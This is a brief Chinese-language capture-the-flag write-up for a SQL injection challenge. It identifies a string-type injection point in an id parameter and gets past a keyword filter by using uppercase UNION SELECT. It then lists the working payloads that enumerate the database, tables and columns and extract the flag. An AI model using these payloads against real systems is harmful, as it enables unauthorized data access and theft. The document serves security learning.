打开界面是查询界面
点击不同的查询页面返回的内容不同,然后url的地址发生变化,毫无疑问注入点在id处
这里直接进行测试
单引号无回显
双引号回显id不存在
初步判断为字符型注入
全真语句测试
1' or 1=1 --1
回了个no
在这里看到了别的wp说很多关联词都过滤了,那这就得使用别的方法了
union 、SELECT(等大写的关联词)都可以
根据前面的知识我们可以知道一共会回显5个字段,所以这里就直接进行sql注入
- 爆库
?id=-1' union SELECT 1,database(),3,4,5 --1
- 爆表
?id=-1' union SELECT 1,(SELECT group_concat(table_name) from INFORMATION_SCHEMA.tables WHERE table_schema="ctf"),3,4,5 --1
- 爆字段
?id=-1' union SELECT 1,(SELECT group_concat(column_name) from INFORMATION_SCHEMA.columns WHERE table_schema="ctf" AND table_name="here_is_flag"),3,4,5 --1
- 爆数据
?id=-1' union SELECT 1,(SELECT flag from here_is_flag),3,4,5 --1